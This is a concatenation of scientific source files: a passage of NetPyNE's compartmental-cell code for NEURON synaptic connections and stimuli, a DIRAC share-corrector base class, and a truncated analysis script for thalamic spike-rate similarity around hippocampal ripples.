if not pointp:
connParams['sec'] = synMechSecs[i]
connParams['loc'] = synMechLocs[i]
if netStimParams:
connParams['preGid'] = 'NetStim'
connParams['preLabel'] = netStimParams['source']
if params.get('gapJunction', 'False') == True: # only run for post gap junc (not pre)
connParams['gapId'] = postGapId
connParams['preGapId'] = preGapId
connParams['gapJunction'] = 'post'
self.conns.append(Dict(connParams))
else: # do not fill in python structure (just empty dict for NEURON obj)
self.conns.append(Dict())
# NEURON objects
if sim.cfg.createNEURONObj:
# gap junctions
if params.get('gapJunction', 'False') in [True, 'pre', 'post']: # create NEURON obj for pre and post
synMechs[i]['hObj'].weight = weights[i]
sourceVar = self.secs[synMechSecs[i]]['hObj'](synMechLocs[i])._ref_v
targetVar = synMechs[i]['hObj']._ref_vpeer # assumes variable is vpeer -- make a parameter
sec = self.secs[synMechSecs[i]]
sim.pc.target_var(targetVar, connParams['gapId'])
self.secs[synMechSecs[i]]['hObj'].push()
sim.pc.source_var(sourceVar, connParams['preGapId'])
h.pop_section()
netcon = None
# connections using NetCons
else:
if pointp:
sec = self.secs[secLabels[0]]
postTarget = sec['pointps'][pointp]['hObj'] # local point neuron
else:
sec = self.secs[synMechSecs[i]]
postTarget = synMechs[i]['hObj'] # local synaptic mechanism
if netStimParams:
netcon = h.NetCon(netstim, postTarget) # create Netcon between netstim and target
else:
netcon = sim.pc.gid_connect(params['preGid'], postTarget) # create Netcon between global gid and target
netcon.weight[weightIndex] = weights[i] # set Netcon weight
netcon.delay = delays[i] # set Netcon delay
#netcon.threshold = threshold # set Netcon threshold
self.conns[-1]['hObj'] = netcon # add netcon object to dict in conns list
# Add time-dependent weight shaping
if 'shape' in params and params['shape']:
temptimevecs = []
tempweightvecs = []
# Default shape
pulsetype = params['shape']['pulseType'] if 'pulseType' in params['shape'] else 'square'
pulsewidth = params['shape']['pulseWidth'] if 'pulseWidth' in params['shape'] else 100.0
pulseperiod = params['shape']['pulsePeriod'] if 'pulsePeriod' in params['shape'] else 100.0
# Determine on-off switching time pairs for stimulus, where default is always on
if 'switchOnOff' not in params['shape']:
switchtimes = [0, sim.cfg.duration]
else:
if not params['shape']['switchOnOff'] == sorted(params['shape']['switchOnOff']):
raise Exception('On-off switching times for a particular stimulus are not monotonic')
switchtimes = deepcopy(params['shape']['switchOnOff'])
switchtimes.append(sim.cfg.duration)
switchiter = iter(switchtimes)
switchpairs = list(zip(switchiter,switchiter))
for pair in switchpairs:
# Note: Cliff's makestim code is in seconds, so conversions from ms to s occurs in the args.
stimvecs = self._shapeStim(width=float(pulsewidth)/1000.0, isi=float(pulseperiod)/1000.0, weight=params['weight'], start=float(pair[0])/1000.0, finish=float(pair[1])/1000.0, stimshape=pulsetype)
temptimevecs.extend(stimvecs[0])
tempweightvecs.extend(stimvecs[1])
self.conns[-1]['shapeTimeVec'] = h.Vector().from_python(temptimevecs)
self.conns[-1]['shapeWeightVec'] = h.Vector().from_python(tempweightvecs)
self.conns[-1]['shapeWeightVec'].play(netcon._ref_weight[weightIndex], self.conns[-1]['shapeTimeVec'])
# Add plasticity
self._addConnPlasticity(params, sec, netcon, weightIndex)
if sim.cfg.verbose:
sec = params['sec'] if pointp else synMechSecs[i]
loc = params['loc'] if pointp else synMechLocs[i]
preGid = netStimParams['source']+' NetStim' if netStimParams else params['preGid']
try:
print((' Created connection preGid=%s, postGid=%s, sec=%s, loc=%.4g, synMech=%s, weight=%.4g, delay=%.2f'
% (preGid, self.gid, sec, loc, params['synMech'], weights[i], delays[i])))
except:
print((' Created connection preGid=%s' % (preGid)))
def modifyConns (self, params):
from .. import sim
for conn in self.conns:
conditionsMet = 1
if 'conds' in params:
for (condKey,condVal) in params['conds'].items(): # check if all conditions are met
# choose what to comapare to
if condKey in ['postGid']:
compareTo = self.gid
else:
compareTo = conn.get(condKey)
# check if conditions met
if isinstance(condVal, list) and isinstance(condVal[0], Number):
if compareTo < condVal[0] or compareTo > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if compareTo not in condVal:
conditionsMet = 0
break
elif compareTo != condVal:
conditionsMet = 0
break
if conditionsMet and 'postConds' in params:
for (condKey,condVal) in params['postConds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list) and isinstance(condVal[0], Number):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if self.tags.get(condKey) not in condVal:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet and 'preConds' in params:
print('Warning: modifyConns() does not yet support conditions of presynaptic cells')
if conditionsMet: # if all conditions are met, set values for this cell
if sim.cfg.createPyStruct:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','preConds','postConds']}.items():
conn[paramName] = paramValue
if sim.cfg.createNEURONObj:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','preConds','postConds']}.items():
try:
if paramName == 'weight':
conn['hObj'].weight[0] = paramValue
else:
setattr(conn['hObj'], paramName, paramValue)
except:
print('Error setting %s=%s on Netcon' % (paramName, str(paramValue)))
def modifyStims (self, params):
from .. import sim
conditionsMet = 1
if 'cellConds' in params:
if conditionsMet:
for (condKey,condVal) in params['cellConds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list):
if self.tags.get(condKey) < condVal[0] or self.tags.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif self.tags.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet == 1:
for stim in self.stims:
conditionsMet = 1
if 'conds' in params:
for (condKey,condVal) in params['conds'].items(): # check if all conditions are met
# check if conditions met
if isinstance(condVal, list) and isinstance(condVal[0], Number):
if stim.get(condKey) < condVal[0] or stim.get(condKey) > condVal[1]:
conditionsMet = 0
break
elif isinstance(condVal, list) and isinstance(condVal[0], basestring):
if stim.get(condKey) not in condVal:
conditionsMet = 0
break
elif stim.get(condKey) != condVal:
conditionsMet = 0
break
if conditionsMet: # if all conditions are met, set values for this cell
if stim['type'] == 'NetStim': # for netstims, find associated netcon
conn = next((conn for conn in self.conns if conn['source'] == stim['source']), None)
if sim.cfg.createPyStruct:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','cellConds']}.items():
if stim['type'] == 'NetStim' and paramName in ['weight', 'delay']:
conn[paramName] = paramValue
else:
stim[paramName] = paramValue
if sim.cfg.createNEURONObj:
for paramName, paramValue in {k: v for k,v in params.items() if k not in ['conds','cellConds']}.items():
try:
if stim['type'] == 'NetStim':
if paramName == 'weight':
conn['hObj'].weight[0] = paramValue
elif paramName in ['delay']:
setattr(conn['hObj'], paramName, paramValue)
elif paramName in ['rate']:
stim['interval'] = 1.0/paramValue
setattr(stim['hObj'], 'interval', stim['interval'])
elif paramName in ['interval']:
stim['rate'] = 1.0/paramValue
setattr(stim['hObj'], 'interval', stim['interval'])
else:
setattr(stim['hObj'], paramName, paramValue)
else:
setattr(stim['hObj'], paramName, paramValue)
except:
print('Error setting %s=%s on stim' % (paramName, str(paramValue)))
def addStim (self, params):
from .. import sim
if not params['sec'] or (isinstance(params['sec'], basestring) and not params['sec'] in list(self.secs.keys())+list(self.secLists.keys())):
if sim.cfg.verbose: print(' Warning: no valid sec specified for stim on cell gid=%d so using soma or 1st available. Existing secs: %s; params: %s'%(self.gid, list(self.secs.keys()),params))
if 'soma' in self.secs:
params['sec'] = 'soma' # use 'soma' if exists
elif self.secs:
params['sec'] = list(self.secs.keys())[0] # if no 'soma', use first sectiona available
else:
if sim.cfg.verbose: print(' Error: no Section available on cell gid=%d to add stim'%(self.gid))
return
if not 'loc' in params: params['loc'] = 0.5 # default stim location
if params['type'] == 'NetStim':
if not 'start' in params: params['start'] = 0 # add default start time
if not 'number' in params: params['number'] = 1e9 # add default number
connParams = {'preGid': params['type'],
'sec': params.get('sec'),
'loc': params.get('loc'),
'synMech': params.get('synMech'),
'weight': params.get('weight'),
'delay': params.get('delay'),
'synsPerConn': params.get('synsPerConn')}
# if 'threshold' in params: connParams['threshold'] = params.get('threshold') # depreacted, set threshold in preSyn cell
if 'shape' in params: connParams['shape'] = params.get('shape')
if 'plast' in params: connParams['plast'] = params.get('plast')
netStimParams = {'source': params['source'],
'type': params['type'],
'rate': params['rate'] if 'rate' in params else 1000.0/params['interval'],
'noise': params['noise'] if 'noise' in params else 0.0,
'number': params['number'],
'start': params['start'],
'seed': params['seed'] if 'seed' in params else sim.cfg.seeds['stim']}
self.addConn(connParams, netStimParams)
elif params['type'] in ['IClamp', 'VClamp', 'SEClamp', 'AlphaSynapse']:
sec = self.secs[params['sec']]
stim = getattr(h, params['type'])(sec['hObj'](params['loc']))
stimParams = {k:v for k,v in params.items() if k not in ['type', 'source', 'loc', 'sec', 'label']}
stringParams = ''
for stimParamName, stimParamValue in stimParams.items(): # set mechanism internal params
if isinstance(stimParamValue, list):
if stimParamName == 'amp':
for i,val in enumerate(stimParamValue):
stim.amp[i] = val
elif stimParamName == 'dur':
for i,val in enumerate(stimParamValue):
stim.dur[i] = val
#setattr(stim, stimParamName._ref_[0], stimParamValue[0])
else:
setattr(stim, stimParamName, stimParamValue)
stringParams = stringParams + ', ' + stimParamName +'='+ str(stimParamValue)
self.stims.append(Dict(params)) # add to python structure
self.stims[-1]['hObj'] = stim # add stim object to dict in stims list
if sim.cfg.verbose: print((' Added %s %s to cell gid=%d, sec=%s, loc=%.4g%s'%
(params['source'], params['type'], self.gid, params['sec'], params['loc'], stringParams)))
else:
if sim.cfg.verbose: print(('Adding exotic stim (NeuroML 2 based?): %s'% params))
sec = self.secs[params['sec']]
stim = getattr(h, params['type'])(sec['hObj'](params['loc']))
stimParams = {k:v for k,v in params.items() if k not in ['type', 'source', 'loc', 'sec', 'label']}
stringParams = ''
for stimParamName, stimParamValue in stimParams.items(): # set mechanism internal params
if isinstance(stimParamValue, list):
print("Can't set point process paramaters of type vector eg. VClamp.amp[3]")
pass
#setattr(stim, stimParamName._ref_[0], stimParamValue[0])
elif 'originalFormat' in params and stimParamName=='originalFormat' and params['originalFormat']=='NeuroML2_stochastic_input':
if sim.cfg.verbose: print((' originalFormat: %s'%(params['originalFormat'])))
rand = h.Random()
stim_ref = params['label'][:params['label'].rfind(self.tags['pop'])]
# e.g. Stim3_2_popPyrS_2_soma_0_5 -> 2
index_in_stim = int(stim_ref.split('_')[-2])
stim_id = stim_ref.split('_')[0]
sim._init_stim_randomizer(rand, stim_id, index_in_stim, sim.cfg.seeds['stim'])
rand.negexp(1)
stim.noiseFromRandom(rand)
params['h%s'%params['originalFormat']] = rand
else:
if stimParamName in ['weight']:
setattr(stim, stimParamName, stimParamValue)
stringParams = stringParams + ', ' + stimParamName +'='+ str(stimParamValue)
self.stims.append(params) # add to python structure
self.stims[-1]['hObj'] = stim # add stim object to dict in stims list
if sim.cfg.verbose: print((' Added %s %s to cell gid=%d, sec=%s, loc=%.4g%s'%
(params['source'], params['type'], self.gid, params['sec'], params['loc'], stringParams)))
def _setConnSections (self, params):
from .. import sim
# if no section specified or single section specified does not exist
if not params.get('sec') or (isinstance(params.get('sec'), basestring) and not params.get('sec') in list(self.secs.keys())+list(self.secLists.keys())):
if sim.cfg.verbose: print(' Warning: no valid sec specified for connection to cell gid=%d so using soma or 1st available'%(self.gid))
if 'soma' in self.secs:
params['sec'] = 'soma' # use 'soma' if exists
elif self.secs:
params['sec'] = list(self.secs.keys())[0] # if no 'soma', use first sectiona available
else:
if sim.cfg.verbose: print(' Error: no Section available on cell gid=%d to add connection'%(self.gid))
sec = -1 # if no Sections available print error and exit
return sec
secLabels = [params['sec']]
# if sectionList or list of sections
elif isinstance(params.get('sec'), list) or params.get('sec') in self.secLists:
secList = list(params['sec']) if isinstance(params['sec'], list) else list(self.secLists[params['sec']])
secLabels = []
for i,section in enumerate(secList):
if section not in self.secs: # remove sections that dont exist; and corresponding weight and delay
if sim.cfg.verbose: print(' Error: Section %s not available so removing from list of sections for connection to cell gid=%d'%(section, self.gid))
secList.remove(section)
if isinstance(params['weight'], list): params['weight'].remove(params['weight'][i])
if isinstance(params['delay'], list): params['delay'].remove(params['delay'][i])
else:
secLabels.append(section)
# if section is string
else:
secLabels = [params['sec']]
return secLabels
def _setConnWeights (self, params, netStimParams, secLabels):
from .. import sim
if netStimParams:
scaleFactor = sim.net.params.scaleConnWeightNetStims
elif isinstance(sim.net.params.scaleConnWeightModels, dict) and sim.net.params.scaleConnWeightModels.get(self.tags['cellModel'], None) is not None:
scaleFactor = sim.net.params.scaleConnWeightModels[self.tags['cellModel']] # use scale factor specific for this cell model
else:
scaleFactor = sim.net.params.scaleConnWeight # use global scale factor
if isinstance(params['weight'],list):
weights = [scaleFactor * w for w in params['weight']]
if len(weights) == 1: weights = [weights[0]] * params['synsPerConn']
else:
weights = [scaleFactor * params['weight']] * params['synsPerConn']
return weights
def _setConnPointP(self, params, secLabels, weightIndex):
from .. import sim
# Find if any point process with V not calculated in section (artifical cell, eg. Izhi2007a)
pointp = None
if len(secLabels)==1 and 'pointps' in self.secs[secLabels[0]]: # check if point processes with 'vref' (artificial cell)
for pointpName, pointpParams in self.secs[secLabels[0]]['pointps'].items():
if 'vref' in pointpParams: # if includes vref param means doesn't use Section v or synaptic mechanisms
pointp = pointpName
if 'synList' in pointpParams:
if params.get('synMech') in pointpParams['synList']:
if isinstance(params.get('synMech'), list):
weightIndex = [pointpParams['synList'].index(synMech) for synMech in params.get('synMech')]
else:
weightIndex = pointpParams['synList'].index(params.get('synMech')) # udpate weight index based pointp synList
if pointp and params['synsPerConn'] > 1: # only single synapse per connection rule allowed
if sim.cfg.verbose: print(' Error: Multiple synapses per connection rule not allowed for cells where V is not in section (cell gid=%d) '%(self.gid))
return -1, weightIndex
return pointp, weightIndex
def _setConnSynMechs (self, params, secLabels):
from .. import sim
synsPerConn = params['synsPerConn']
if not params.get('synMech'):
if sim.net.params.synMechParams: # if no synMech specified, but some synMech params defined
synLabel = list(sim.net.params.synMechParams.keys())[0] # select first synMech from net params and add syn
params['synMech'] = synLabel
if sim.cfg.verbose: print(' Warning: no synaptic mechanisms specified for connection to cell gid=%d so using %s '%(self.gid, synLabel))
else: # if no synaptic mechanism specified and no synMech params available
if sim.cfg.verbose: print(' Error: no synaptic mechanisms available to add conn on cell gid=%d '%(self.gid))
return -1 # if no Synapse available print error and exit
# if desired synaptic mechanism specified in conn params
if synsPerConn > 1: # if more than 1 synapse
if len(secLabels) == 1: # if single section, create all syns there
synMechSecs = [secLabels[0]] * synsPerConn # same section for all
if isinstance(params['loc'], list):
if len(params['loc']) == synsPerConn:
synMechLocs = params['loc']
else:
print("Error: The length of the list of locations does not match synsPerConn (distributing uniformly)")
synMechSecs, synMechLocs = self._distributeSynsUniformly(secList=secLabels, numSyns=synsPerConn)
else:
synMechLocs = [i*(1.0/synsPerConn)+1.0/synsPerConn/2 for i in range(synsPerConn)]
else: # if multiple sections, distribute syns
synMechSecs, synMechLocs = self._distributeSynsUniformly(secList=secLabels, numSyns=synsPerConn)
else:
synMechSecs = secLabels
synMechLocs = params['loc'] if isinstance(params['loc'], list) else [params['loc']]
# randomize the section to connect to and move it to beginning of list
if sim.cfg.connRandomSecFromList and len(synMechSecs)>1:
rand = h.Random()
preGid = params['preGid'] if isinstance(params['preGid'], int) else 0
rand.Random123(sim.hashStr('connSynMechsSecs'), self.gid, preGid) # initialize randomizer
pos = int(rand.discunif(0, len(synMechSecs)-1))
synMechSecs[pos], synMechSecs[0] = synMechSecs[0], synMechSecs[pos]
if len(synMechLocs)>1:
synMechLocs[pos], synMechLocs[0] = synMechLocs[0], synMechLocs[pos]
# add synaptic mechanism to section based on synMechSecs and synMechLocs (if already exists won't be added)
synMechs = [self.addSynMech(synLabel=params['synMech'], secLabel=synMechSecs[i], loc=synMechLocs[i]) for i in range(synsPerConn)]
return synMechs, synMechSecs, synMechLocs
def _distributeSynsUniformly (self, secList, numSyns):
from .. import sim
from numpy import cumsum
if 'L' in self.secs[secList[0]]['geom']:
secLengths = [self.secs[s]['geom']['L'] for s in secList]
elif getattr(self.secs[secList[0]]['hObj'], 'L', None):
secLengths = [self.secs[s]['hObj'].L for s in secList]
else:
secLengths = [1.0 for s in secList]
if sim.cfg.verbose:
print((' Section lengths not available to distribute synapses in cell %d'%self.gid))
try:
totLength = sum(secLengths)
cumLengths = list(cumsum(secLengths))
absLocs = [i*(totLength/numSyns)+totLength/numSyns/2 for i in range(numSyns)]
inds = [cumLengths.index(next(x for x in cumLengths if x >= absLoc)) for absLoc in absLocs]
secs = [secList[ind] for ind in inds]
locs = [(cumLengths[ind] - absLoc) / secLengths[ind] for absLoc,ind in zip(absLocs,inds)]
except:
secs, locs = [],[]
return secs, locs
def _addConnPlasticity (self, params, sec, netcon, weightIndex):
from .. import sim
plasticity = params.get('plast')
if plasticity and sim.cfg.createNEURONObj:
try:
plastMech = getattr(h, plasticity['mech'], None)(0, sec=sec['hObj']) # create plasticity mechanism (eg. h.STDP)
for plastParamName,plastParamValue in plasticity['params'].items(): # add params of the plasticity mechanism
setattr(plastMech, plastParamName, plastParamValue)
if plasticity['mech'] == 'STDP': # specific implementation steps required for the STDP mech
precon = sim.pc.gid_connect(params['preGid'], plastMech); precon.weight[0] = 1 # Send presynaptic spikes to the STDP adjuster
pstcon = sim.pc.gid_connect(self.gid, plastMech); pstcon.weight[0] = -1 # Send postsynaptic spikes to the STDP adjuster
h.setpointer(netcon._ref_weight[weightIndex], 'synweight', plastMech) # Associate the STDP adjuster with this weight
#self.conns[-1]['hPlastSection'] = plastSection
self.conns[-1]['hSTDP'] = plastMech
self.conns[-1]['hSTDPprecon'] = precon
self.conns[-1]['hSTDPpstcon'] = pstcon
self.conns[-1]['STDPdata'] = {'preGid':params['preGid'], 'postGid': self.gid, 'receptor': weightIndex} # Not used; FYI only; store here just so it's all in one place
if sim.cfg.verbose: print(' Added STDP plasticity to synaptic mechanism')
except:
print('Error: exception when adding plasticity using %s mechanism' % (plasticity['mech']))
def getSomaPos(self):
''' Get soma position;
Used to calculate seg coords for LFP calc (one per population cell; assumes same morphology)'''
n3dsoma = 0
r3dsoma = np.zeros(3)
for sec in [sec for secName, sec in self.secs.items() if 'soma' in secName]:
sec['hObj'].push()
n3d = int(h.n3d()) # get number of n3d points in each section
r3d = np.zeros((3, n3d)) # to hold locations of 3D morphology for the current section
n3dsoma += n3d
for i in range(n3d):
r3dsoma[0] += h.x3d(i)
r3dsoma[1] += h.y3d(i)
r3dsoma[2] += h.z3d(i)
h.pop_section()
r3dsoma /= n3dsoma
return r3dsoma
def calcAbsSegCoords(self):
''' Calculate absolute seg coords by translating the relative seg coords -- used for LFP calc'''
from .. import sim
p3dsoma = self.getSomaPos()
pop = self.tags['pop']
morphSegCoords = sim.net.pops[pop]._morphSegCoords
# rotated coordinates around z axis first then shift relative to the soma
self._segCoords = {}
p3dsoma = p3dsoma[np.newaxis].T # trasnpose 1d array to enable matrix calculation
self._segCoords['p0'] = p3dsoma + morphSegCoords['p0']
self._segCoords['p1'] = p3dsoma + morphSegCoords['p1']
def setImembPtr(self):
"""Set PtrVector to point to the i_membrane_"""
jseg = 0
for sec in list(self.secs.values()):
hSec = sec['hObj']
for iseg, seg in enumerate(hSec):
self.imembPtr.pset(jseg, seg._ref_i_membrane_) # notice the underscore at the end (in nA)
jseg += 1
def getImemb(self):
"""Gather membrane currents from PtrVector into imVec (does not need a loop!)"""
self.imembPtr.gather(self.imembVec)
return self.imembVec.as_numpy() # (nA)
def updateShape(self):
"""Call after h.define_shape() to update cell coords"""
x = self.tags['x']
y = -self.tags['y'] # Neuron y-axis positive = upwards, so assume pia=0 and cortical depth = neg
z = self.tags['z']
for sec in list(self.secs.values()):
if 'geom' in sec and 'pt3d' not in sec['geom']: # only cells that didn't have pt3d before
sec['geom']['pt3d'] = []
sec['hObj'].push()
n3d = int(h.n3d()) # get number of n3d points in each section
for i in range(n3d):
# by default L is added in x-axis; shift to y-axis; z increases 100um for each cell so set to 0
pt3d = [h.y3d(i), h.x3d(i), 0, h.diam3d(i)]
sec['geom']['pt3d'].append(pt3d)
h.pt3dchange(i, x+pt3d[0], y+pt3d[1], z+pt3d[2], pt3d[3], sec=sec['hObj'])
h.pop_section()
|
thekerrlab/netpyne
|
netpyne/cell/compartCell.py
|
Python
|
mit
| 67,771
|
[
"NEURON"
] |
cdaae240cdadac0f4a7eac9fce8b11bda6a209467c870fcb25ccb51f03e8f38b
|
""" Base corrector for the group and ingroup shares
"""
from DIRAC import S_OK, S_ERROR
__RCSID__ = "$Id$"
class BaseCorrector(object):
def __init__(self, opsHelper, baseCSPath, group):
self.__opsHelper = opsHelper
self.__baseCSPath = baseCSPath
self.__group = group
def initialize(self):
return S_OK()
def getCSOption(self, opName, defValue=None):
return self.__opsHelper.getValue("%s/%s" % (self.__baseCSPath, opName), defValue)
def getiCSOptions(self, opName=""):
return self.__opsHelper.getSections("%s/%s" % (self.__baseCSPath, opName))
def getCSSections(self, secName=""):
return self.__opsHelper.getSections("%s/%s" % (self.__baseCSPath, secName))
def getGroup(self):
return self.__group
def updateHistoryKnowledge(self):
return S_OK()
def applyCorrection(self, entitiesExpectedShare):
return S_ERROR("applyCorrection function has not been implemented")
|
chaen/DIRAC
|
WorkloadManagementSystem/private/correctors/BaseCorrector.py
|
Python
|
gpl-3.0
| 929
|
[
"DIRAC"
] |
e2f8d605f08d864eb429aae52ab7a1cfa33e866bc7e620408142512785482932
|
#!/usr/bin/env python
'''
File name: main_ripp_mod.py
Author: Guillaume Viejo
Date created: 16/08/2017
Python Version: 3.5.2
'''
import sys
import numpy as np
import pandas as pd
import scipy.io
from functions import *
# from pylab import *
from multiprocessing import Pool
import os
import neuroseries as nts
from time import time
from pylab import *
from functions import quickBin
from numba import jit
import _pickle as cPickle
@jit(nopython=True)
def scalarProduct(r):
tmp = np.sqrt(np.power(r, 2).sum(1))
denom = tmp[0:-1] * tmp[1:]
num = np.sum(r[0:-1]*r[1:], 1)
return num/(denom)
@jit(nopython=True)
def quickBin(spikelist, ts, bins, index):
rates = np.zeros((len(ts), len(bins)-1, len(index)))
for i, t in enumerate(ts):
tbins = t + bins
for j in range(len(spikelist)):
a, _ = np.histogram(spikelist[j], tbins)
rates[i,:,j] = a
return rates
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
anglehd = {}
anglenohd = {}
zanglehd = {}
zanglenohd = {}
for session in datasets:
print(session)
generalinfo = scipy.io.loadmat(data_directory+session+'/Analysis/GeneralInfo.mat')
shankStructure = loadShankStructure(generalinfo)
if len(generalinfo['channelStructure'][0][0][1][0]) == 2:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][1][0][0] - 1
else:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][0][0][0] - 1
spikes,shank = loadSpikeData(data_directory+session+'/Analysis/SpikeData.mat', shankStructure['thalamus'])
wake_ep = loadEpoch(data_directory+session, 'wake')
sleep_ep = loadEpoch(data_directory+session, 'sleep')
sws_ep = loadEpoch(data_directory+session, 'sws')
rem_ep = loadEpoch(data_directory+session, 'rem')
sleep_ep = sleep_ep.merge_close_intervals(threshold=1.e3)
sws_ep = sleep_ep.intersect(sws_ep)
rem_ep = sleep_ep.intersect(rem_ep)
rip_ep,rip_tsd = loadRipples(data_directory+session)
rip_ep = sws_ep.intersect(rip_ep)
rip_tsd = rip_tsd.restrict(sws_ep)
hd_info = scipy.io.loadmat(data_directory+session+'/Analysis/HDCells.mat')['hdCellStats'][:,-1]
hd_info_neuron = np.array([hd_info[n] for n in spikes.keys()])
####################################################################################################################
# binning data
####################################################################################################################
spikeshd = {k:spikes[k] for k in np.where(hd_info_neuron==1)[0] if k not in []}
spikesnohd = {k:spikes[k] for k in np.where(hd_info_neuron==0)[0] if k not in []}
hdneurons = np.sort(list(spikeshd.keys()))
nohdneurons = np.sort(list(spikesnohd.keys()))
bin_size = 40
n_ex = 2000
rnd_tsd = nts.Ts(t = np.sort(np.hstack([np.random.randint(sws_ep.loc[i,'start']+500000, sws_ep.loc[i,'end']+500000, np.maximum(1,n_ex//len(sws_ep))) for i in sws_ep.index])))
####################################################################################################################
# MEAN AND STD SWS
####################################################################################################################
# # mean and standard deviation during SWS
# mean_sws = pd.DataFrame(index = np.sort(list(spikes.keys())), columns = ['min', 'max'])
# for n in spikes.keys():
# r = []
# for e in sws_ep.index:
# bins = np.arange(sws_ep.loc[e,'start'], sws_ep.loc[e,'end'], bin_size*1e3)
# a, _ = np.histogram(spikes[n].restrict(sws_ep.loc[[e]]).index.values, bins)
# r.append(a)
# r = np.hstack(r)
# r = r / (bin_size*1e-3)
# mean_sws.loc[n,'min']= r.min()
# mean_sws.loc[n,'max']= r.max()
bins = np.arange(0, 2000+2*bin_size, bin_size) - 1000 - bin_size/2
times = bins[0:-1] + np.diff(bins)/2
####################################################################################################################
# HD NEURONS
####################################################################################################################
if len(spikeshd) >=5:
ts = rip_tsd.as_units('ms').index.values
rates = quickBin([spikeshd[j].as_units('ms').index.values for j in hdneurons], ts, bins, hdneurons)
# # rates = rates /float(bin_size*1e-3)
# angle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
# for i, r in enumerate(rates):
# tmp = scalarProduct(r)
# angle[i] = tmp
# random
ts = rnd_tsd.as_units('ms').index.values
rates2 = quickBin([spikeshd[j].as_units('ms').index.values for j in hdneurons], ts, bins, hdneurons)
# # rates2 = rates2/float(bin_size*1e-3)
# shuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
# for i, r in enumerate(rates2):
# tmp = scalarProduct(r)
# shuffled[i] = tmp
# anglehd[session] = (angle.mean(1) - shuffled.mean(1))/shuffled.mean(1)
# normalized
zangle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
min_ = rates.min(0).min(0)
max_ = rates.max(0).max(0)
zrates = (rates - min_) / (max_ - min_)
for i, r in enumerate(zrates):
tmp = scalarProduct(r)
zangle[i] = tmp
# random
zshuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
min_ = rates2.min(0).min(0)
max_ = rates2.max(0).max(0)
zrates2 = (rates2 - min_) / (max_ - min_)
for i, r in enumerate(zrates2):
tmp = scalarProduct(r)
zshuffled[i] = tmp
zanglehd[session] = (zangle.mean(1) - zshuffled.mean(1))/zshuffled.mean(1)
anglehd[session] = zangle #.fillna(0)
####################################################################################################################
# NO HD NEURONS
####################################################################################################################
if len(spikesnohd) >=5:
ts = rip_tsd.as_units('ms').index.values
rates = quickBin([spikesnohd[j].as_units('ms').index.values for j in nohdneurons], ts, bins, nohdneurons)
# # rates = rates/float(bin_size*1e-3)
# angle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
# for i, r in enumerate(rates):
# angle[i] = scalarProduct(r)
# random
ts = rnd_tsd.as_units('ms').index.values
rates2 = quickBin([spikesnohd[j].as_units('ms').index.values for j in nohdneurons], ts, bins, nohdneurons)
# # rates2 = rates2/float(bin_size*1e-3)
# shuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
# for i, r in enumerate(rates2):
# shuffled[i] = scalarProduct(r)
# anglenohd[session] = (angle.mean(1) - shuffled.mean(1))/shuffled.mean(1)
# normalized
zangle = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rip_tsd)))
min_ = rates.min(0).min(0)
max_ = rates.max(0).max(0)
zrates = (rates - min_) / (max_ - min_)
for i, r in enumerate(zrates):
zangle[i] = scalarProduct(r)
# random
zshuffled = pd.DataFrame(index = times[0:-1], columns = np.arange(len(rnd_tsd)))
# zrates2 = (rates2 - m) / (s+1)
min_ = rates2.min(0).min(0)
max_ = rates2.max(0).max(0)
zrates2 = (rates2 - min_) / (max_ - min_)
for i, r in enumerate(zrates2):
zshuffled[i] = scalarProduct(r)
zanglenohd[session] = (zangle.mean(1) - zshuffled.mean(1))/zshuffled.mean(1)
anglenohd[session] = zangle #.fillna(0)
# anglehd = pd.DataFrame.from_dict(anglehd)
# anglenohd = pd.DataFrame.from_dict(anglenohd)
# anglehd = anglehd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
# anglenohd = anglenohd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
zanglehd = pd.DataFrame.from_dict(zanglehd)
zanglenohd = pd.DataFrame.from_dict(zanglenohd)
zanglehd = zanglehd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
zanglenohd = zanglenohd.rolling(window=10,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
# subplot(211)
# plot(anglehd.mean(1), label = 'hd')
# plot(anglenohd.mean(1), label = 'no hd')
# legend()
# title("Scalar product")
# subplot(212)
figure()
plot(zanglehd.mean(1))
plot(zanglenohd.mean(1))
legend()
title("Scalar product + norm [0 1]")
# comparing with isomap radius
path = '../figures/figures_articles_v4/figure1/'
files = [f for f in os.listdir(path) if '.pickle' in f and 'Mouse' in f]
files.remove("Mouse17-130129.pickle")
radius = []
velocity = []
stability = []
order = []
for f in files:
data = cPickle.load(open(path+f, 'rb'))
swrvel = []
swrrad = []
for n in data['swr'].keys():
iswr = data['swr'][n]['iswr']
rip_tsd = data['swr'][n]['rip_tsd']
times = data['swr'][n]['times']
normswr = np.sqrt(np.sum(np.power(iswr, 2), -1))
normswr = pd.DataFrame(index = times, columns = rip_tsd.index.values.astype('int'), data = normswr.T)
swrrad.append(normswr)
angswr = np.arctan2(iswr[:,:,1], iswr[:,:,0])
angswr = (angswr + 2*np.pi)%(2*np.pi)
